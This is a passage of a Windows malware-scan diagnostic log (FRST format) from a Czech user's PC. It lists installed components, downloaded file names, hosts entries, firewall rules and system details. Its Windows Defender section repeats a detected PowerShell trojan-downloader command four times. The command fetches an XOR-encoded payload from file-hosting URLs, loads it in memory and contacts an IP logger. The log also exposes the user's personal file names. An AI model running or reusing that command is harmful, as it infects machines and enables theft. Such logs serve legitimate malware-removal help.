2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in
2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
13-01-2021 21:32:33 Instalační služba modulů systému Windows
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (01/20/2021 08:00:00 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
System errors:
=============
Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.
Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 07:09:04 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.
Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Windows Defender:
===================================
Date: 2021-01-20 19:28:36.8570000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2538.0, AS: 1.329.2538.0, NIS: 1.329.2538.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 18:14:17.7510000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2534.0, AS: 1.329.2534.0, NIS: 1.329.2534.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 17:09:21.2090000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2528.0, AS: 1.329.2528.0, NIS: 1.329.2528.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 15:18:54.2110000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {5BABBB36-9445-4077-8621-59FC0CF7C04A}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2021-01-20 11:15:09.7920000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2519.0, AS: 1.329.2519.0, NIS: 1.329.2519.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
==================== Memory info ===========================
BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 90%
Total physical RAM: 3767.05 MB
Available physical RAM: 356.34 MB
Total Virtual: 7351.05 MB
Available Virtual: 3556.64 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:111.19 GB) (Free:62.69 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:230.27 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32
\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
